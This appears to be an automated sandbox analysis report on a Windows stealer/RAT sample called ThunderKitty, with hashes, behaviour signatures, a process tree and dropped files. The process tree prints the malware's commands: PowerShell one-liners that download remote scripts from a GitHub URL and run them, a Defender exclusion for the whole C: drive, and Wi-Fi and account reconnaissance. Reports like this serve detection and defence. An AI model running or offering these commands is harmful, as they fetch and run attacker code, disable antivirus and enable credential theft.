Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 05:24

General

  • Target

    2024-09-20_4448fcaab86e54d791bfb2ce227ef891_poet-rat_snatch.exe

  • Size

    9.3MB

  • MD5

    4448fcaab86e54d791bfb2ce227ef891

  • SHA1

    855819993e5d39cbbf414ee2fd1f832f10c5cd3c

  • SHA256

    461d0ba834858b5aba874609cf0dbd60c1d22d76b8beb998e7f0400b5929e721

  • SHA512

    e3b11f4b5dc1f5b1058af170e198f4ae036233aed727972116f485bb400bf28b3cde10952565c64f748e99279d089d1bcdb065d5bfa6241b572dfd363d757c93

  • SSDEEP

    98304:zs0zCN3O5ZSgiAGdIA9S8785AEo6qM4vFzb4:433O5ZS/W5xo

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-09-20_4448fcaab86e54d791bfb2ce227ef891_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-09-20_4448fcaab86e54d791bfb2ce227ef891_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xwb5hn3r\xwb5hn3r.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES833A.tmp" "c:\Users\Admin\AppData\Local\Temp\xwb5hn3r\CSCBFF970567A344E60A14B8A7A5536A10.TMP"
          4⤵
            PID:2120
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4704
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5032
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:4844
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1236
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:2280
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2776
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:2172
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:3572
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:868
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:1232
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:336
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:2352
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:4232
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:1688
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:4436
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:2124
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:3868
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3408
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4568

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    d067ad73aa478cfa79d1e1f3eb98d62a

                    SHA1

                    93bc212130b29d0cbad857ec448159695f6b89fa

                    SHA256

                    d5114fe3e9e868d369981f408d7c460b2b156be2aa3c0e67e60ac9c20f0e58cd

                    SHA512

                    d01079f39ea999288bf54ef2b83413b9bde14a5dfbf0037e77a2a8dfb3bb7f82b625823aeaca7d52884eab26cc43c1c49083c4b0b105d9753505648e487a6738

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    c69e5c86bb7bcac84492a5fb80b23e46

                    SHA1

                    ad0f323298a5cebcec98eef1a1069debfe1f7d7c

                    SHA256

                    32d2345faf8b9a6a95f023cf02b820b0a86d41eadf786e91752bc9d7bc40baf1

                    SHA512

                    18482a071fd00a337a499a4dd9d2db3783d77be209be57c92eb9edba3b8f68fffbc2a484be823d2d3708d2f7fe1ef8bf670e1856e2f394d72b2502ab3d8cbfb1

                  • C:\Users\Admin\AppData\Local\Temp\RES833A.tmp

                    Filesize

                    1KB

                    MD5

                    e7e81778c4ab7e9380aae9684b77a977

                    SHA1

                    f46ca441cd91f6640922a9dd8a628bb2cbb77276

                    SHA256

                    df7747ce5ddbaf8bb247624759b0449ec594152e7059c98c8f66f28aa98e63fe

                    SHA512

                    240037dda2a52f5ce9243e0f9166f0c3af0ca6cc86f36505d6616568185f955085bc258628533f7f894cfc4fee38eb199a2515e2243309f4e4835de62308727c

                  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                    Filesize

                    245KB

                    MD5

                    b3a0a62c12e8775f0121eeaf7d671a02

                    SHA1

                    a18c6b12bee4dc7e6844367643e488d858b0e374

                    SHA256

                    b52d6bb87974e491052baa2e056d1bdd62d1b3267d49b70935b76e53a7d1a50e

                    SHA512

                    b931652dc2c7aa24208261e0c8401adee073cdb2f49fc61bf12b0a38b111b55027bf311a4e59e89820be028de8647451d04cd20137671a9a55b9500e1b5723af

                  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                    Filesize

                    22KB

                    MD5

                    eda677ada8aa6a36a10fa5bd85730d73

                    SHA1

                    566b47d1860f92e12583b193ea3cb88255050a57

                    SHA256

                    7c7091e1f0a773b38cc38857f2d7f2176f85d879300f88d17bfd25f04238e1a2

                    SHA512

                    78b271f3dcd1a6424f945cbd37a0a69b7acb5e7a73b80ef4a685b3bee3f0c6e8cb82ca5cf337cf7cb412f7977d0d06f26e829b8bcdf10c5b4335a2b307486966

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kv05gjyi.qbe.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\xwb5hn3r\xwb5hn3r.dll

                    Filesize

                    4KB

                    MD5

                    c841b3b0628832c66cbe50033223b15c

                    SHA1

                    6daec2074d6f02bfd56734a718bda36041e94d27

                    SHA256

                    14813adfbd15147832093e4a465a123da80ddb2e2087b4182ab29cca699e3a5f

                    SHA512

                    6b1d9f55e9bb3f15a1a6622589ee168f19f22d1b4cf34a22ed3ea95bfd8c4150e57545dfa98c8ec1cbe61c7511d5fd23efeb3157d9a04e55ebeae4cf54d16f02

                  • \??\c:\Users\Admin\AppData\Local\Temp\xwb5hn3r\CSCBFF970567A344E60A14B8A7A5536A10.TMP

                    Filesize

                    652B

                    MD5

                    a1cd525db973a91b7a12a9a62990982e

                    SHA1

                    1f7cc1ddbacdc61c43ab7c61ce42cff6e3c45363

                    SHA256

                    268feb4383fb8dc939f32a712642d6d094b3a96827fba1a9f6dc481e2ff23360

                    SHA512

                    5d921283e01db4c22cfd5e94465e3d9e2033fd02eb0c802bd3ff4455e1924f4246df314722807fd5e35c773f3fff607ae32a5575a452b21bfbba4432ee7f4103

                  • \??\c:\Users\Admin\AppData\Local\Temp\xwb5hn3r\xwb5hn3r.0.cs

                    Filesize

                    1KB

                    MD5

                    8a1e7edb2117ec5dde9a07016905923b

                    SHA1

                    0155dbeeb16333e2eaa767b0209750efee56f47f

                    SHA256

                    c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                    SHA512

                    4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                  • \??\c:\Users\Admin\AppData\Local\Temp\xwb5hn3r\xwb5hn3r.cmdline

                    Filesize

                    369B

                    MD5

                    ecca57aed9161503f24ef108a9262e64

                    SHA1

                    c8c7e07f385688565dfe021e04f5ef7c17bdf546

                    SHA256

                    a04d46f62b7a0c64a48bc0e66e540debf64bd13f4134333032ca31ba9516bb1c

                    SHA512

                    6bd4115dff0d42f82bc699e5beef831605072181298b243e7f585ce118e959a0a70ee5973a1564eb366235931cda73255de4f4802aa3659b56949b9dea4c9d0d

                  • memory/1660-64-0x000001C926240000-0x000001C926248000-memory.dmp

                    Filesize

                    32KB

                  • memory/1660-111-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1660-37-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1660-36-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1660-101-0x000001C9270D0000-0x000001C9270E2000-memory.dmp

                    Filesize

                    72KB

                  • memory/1660-34-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1660-68-0x000001C9270C0000-0x000001C9270EA000-memory.dmp

                    Filesize

                    168KB

                  • memory/1660-69-0x000001C9270C0000-0x000001C9270E4000-memory.dmp

                    Filesize

                    144KB

                  • memory/1660-102-0x000001C9270C0000-0x000001C9270CA000-memory.dmp

                    Filesize

                    40KB

                  • memory/3408-44-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3408-35-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3408-33-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3408-14-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4568-56-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4568-31-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4568-32-0x00007FF99E430000-0x00007FF99EEF1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4568-0-0x00007FF99E433000-0x00007FF99E435000-memory.dmp

                    Filesize

                    8KB

                  • memory/4568-45-0x00000288753B0000-0x0000028875B56000-memory.dmp

                    Filesize

                    7.6MB

                  • memory/4568-9-0x00000288746E0000-0x0000028874702000-memory.dmp

                    Filesize

                    136KB